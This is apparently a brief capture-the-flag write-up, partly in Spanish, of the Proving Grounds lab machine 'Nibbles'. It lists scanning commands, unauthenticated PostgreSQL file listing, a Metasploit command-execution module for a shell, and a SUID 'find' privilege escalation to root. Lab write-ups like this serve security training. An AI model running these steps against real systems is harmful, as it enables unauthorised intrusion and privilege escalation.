Nibbles2

Nibbles2


ProvingGrounds Linux

nmap -A -p- -oA nibbles 192.168.137.47 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA nibbles 192.168.137.47

nmap -sU -O -p- -oA nibbles-udp 192.168.137.47

nikto -h 192.168.137.47:80

ssh_command.

ssh_command.

whatweb http://192.168.137.47

ssh_command.

psql -U postgres -p 5437 -h 192.168.137.47

Select pg_ls_dir(‘/home’);

ssh_command.

Select pg_ls_dir(‘/home/wilson/local.txt’);

ssh_command.

Trate de hacer un query para que me diera un reverse shell pero no me funciono.

ssh_command.

use exploit/multi/postgres/postgres_copy_from_program_cmd_exec

ssh_command.

Seteamos el LHOST,LPORT RHOST, y RPORT

ssh_command.

Lo corremos con run

ssh_command.

echo $PATH

find / -perm -u=s -type f 2>/dev/null

ssh_command.

find . -exec /bin/sh -p ; -quit

ssh_command.

© 2025 Cu3rv0x